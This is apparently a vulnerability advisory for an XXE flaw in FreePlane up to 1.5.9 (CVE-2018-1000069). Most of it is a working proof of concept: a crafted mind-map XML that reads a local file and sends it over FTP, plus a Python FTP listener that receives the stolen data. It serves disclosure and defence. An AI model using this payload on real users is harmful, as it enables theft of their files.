in Vulerability XXE Open Source

FreePlane <= 1.5.9 XXE

What FreePlane is?
FreePlane is an open-source application intended for creating mind maps.

freeplane

Vulnerability descripton:
FreePlane is Java-based app that loads its mind maps that are stored as a simple XML files. The parser allowed to expand external entities that caused this vulnerability.

Results:
When victim opens maliciously crafted mind map, any accessible by Java file can be sent to the attacker.

Proof of concept:
Malicious mindmap:

<map version="freeplane 1.5.9">
<!DOCTYPE node [
<!ENTITY % start "<![CDATA[">
<!ENTITY % data SYSTEM "file:////path/secret_file.txt">
<!ENTITY % end "]]>">
<!ENTITY % all "%start;%data;%end;">
<!ENTITY % c "<!ENTITY send SYSTEM 'ftp://127.0.0.1:2121/%all;'>">
%c;
]>
<!--To view this file, download free mind mapping software Freeplane from http://freeplane.sourceforge.net -->
<node TEXT="FreePlane PWNED" FOLDED="false" ID="ID_1702614147" CREATED="1488125426040" MODIFIED="1488125446531" STYLE="oval">
<node TEXT="Test" ID="ID_190033427" CREATED="1488125470150" MODIFIED="1488125471280"/>
<node TEXT="Test" ID="ID_935990512" CREATED="1488125471478" MODIFIED="1488125473816"/>
</node>
<node>&send;</node>
</map>

Simple FTP server:

#!/usr/env/python
from __future__ import print_function
import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('127.0.0.1',2121))
s.listen(1)
print('XXE-FTP listening')
conn,addr = s.accept()
conn.sendall('220 Staal XXE-FTP\r\n'.encode())
stop = False
while not stop:
    dp = str(conn.recv(1024))
    if dp.find("USER") > -1:
        conn.sendall("331 password please - version check\r\n".encode())
    else:
        conn.sendall("230 more data please!\r\n".encode())
    if dp.find("RETR")==0 or dp.find("QUIT")==0:
        stop = True
    if dp.find("CWD") > -1:
        print(dp.replace('CWD ','/',1).replace('\r\n',''),end='')
    if dp.find("RETR") > -1:
        print(dp.replace("RETR", '\033[92m[*] RECEIVED DATA\033[0m\r\n', 1))

conn.close()
s.close()

References:
CVE-2018-1000069
OWASP TOP 10 - XXE